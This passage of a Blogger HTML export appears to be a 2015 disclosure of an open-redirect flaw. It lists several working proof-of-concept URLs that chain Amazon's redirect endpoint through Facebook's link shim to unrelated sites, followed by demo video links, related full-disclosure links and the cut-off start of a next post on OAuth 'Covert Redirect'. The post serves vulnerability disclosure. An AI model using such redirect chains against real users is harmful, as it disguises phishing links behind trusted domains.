<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.nicovideo.jp%20%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1">http://www.amazon.de/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_1bI9sb0R0MNZH?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>nicovideo.jp%26h%3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.co.uk/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_Zzbbtb04XETQB?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>bbc.co.uk%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.ca/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_G7uctb099ZX2N?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%<wbr></wbr>252Fgoogleadservices.com%26h%<wbr></wbr>3D_AQHylR65AQG3dZfbwarP74zIO_<wbr></wbr>Gj_ndx4h1QB1r7qbJx4Q&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.co.jp/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>pornhub.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.fr/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>naver.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.it/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>craigslist.org%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be</span></a></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=f4W63YXnbIk"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=f4W63YXnbIk</span></a></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html">http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Related Articles:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Jan/22">http://seclists.org/fulldisclosure/2015/Jan/22</a></span></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/01/12/1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/01/12/1</span></a></div>
<div style="margin: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=142104333521454&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142104333521454&w=4</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/facebook-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/essaybeans/posts/570476126427191">https://www.facebook.com/essaybeans/posts/570476126427191</a></span></div>
<div style="margin: 0px;">
<a href="http://germancast.blogspot.de/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
<div style="margin: 0px;">
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://essaybeans.lofter.com/post/1cc77d20_7300027" target="_blank">http://essaybeans.lofter.com/<wbr></wbr>post/1cc77d20_7300027</a></span></div>
<div>
<div style="margin: 0px;">
<a href="http://qianqiuxue.tumblr.com/post/120750458855/itinfotech-facebook-web-security-0day-bug" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://qianqiuxue.tumblr.com/<wbr></wbr>post/120750458855/itinfotech-<wbr></wbr>facebook-web-security-0day-bug</span></a></div>
</div>
<div style="margin: 0px;">
<a href="https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993</span></a></div>
<div style="margin: 0px;">
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/phishing/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/phishing/facebook-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120750347586/facebook-web-security-0day-bug" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120750347586/facebook-<wbr></wbr>web-security-0day-bug</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_72fd108" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_72fd108</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://russiapost.blogspot.ru/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/tetraphibious/status/606676645265567744" target="_blank">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606676645265567744</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/hb6seddG561" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>hb6seddG561</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155501020837/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155501020837/</span></a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br class="Apple-interchange-newline" /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-71995270179155357772015-06-04T08:10:00.001-07:002015-06-04T08:10:10.798-07:00OAuth and OpenID Users Threatened by New Security Flaw, Covert Redirect<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
